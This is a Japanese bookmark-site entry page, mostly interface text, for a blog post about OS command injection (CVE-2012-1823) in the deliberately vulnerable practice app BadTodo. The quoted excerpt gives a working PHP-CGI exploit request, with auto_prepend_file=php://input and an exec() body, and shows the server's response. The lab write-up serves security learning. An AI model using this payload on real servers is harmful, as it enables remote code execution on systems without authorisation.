エントリーの編集
エントリーの編集は全ユーザーに共通の機能です。
必ずガイドラインを一読の上ご利用ください。
やられアプリ BadTodo - 8.1 OS コマンド・インジェクション(リモートコード実行。CVE-2012-1823) - demandosigno
記事へのコメント0件
- 注目コメント
- 新着コメント
このエントリーにコメントしてみましょう。
注目コメント算出アルゴリズムの一部にLINEヤフー株式会社の「建設的コメント順位付けモデルAPI」を使用しています
- バナー広告なし
- ミュート機能あり
- ダークモード搭載
関連記事
やられアプリ BadTodo - 8.1 OS コマンド・インジェクション(リモートコード実行。CVE-2012-1823) - demandosigno
前回:やられアプリ BadTodo - 7 リモート・ファイルインクルード(RFI) - demandosigno 古いPHPにはリ... 前回:やられアプリ BadTodo - 7 リモート・ファイルインクルード(RFI) - demandosigno 古いPHPにはリモートからスクリプト実行を許す脆弱性があります。(CVE-2012-1823) OSコマンドがウェブサーバ上で実行され、その結果がウェブブラウザに返されます。 ZAPの例の通りリクエストを送ってみます。 POST https://todo.example.jp/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input Body部 <?php exec('echo 7kv8fy0o9xhosg4ev3vk',$colm);echo join("",$colm);die();?> レスポンス 7kv8fy0o9xhosg4ev3vk JVNDB-2012-002235 - JVN iPedia - 脆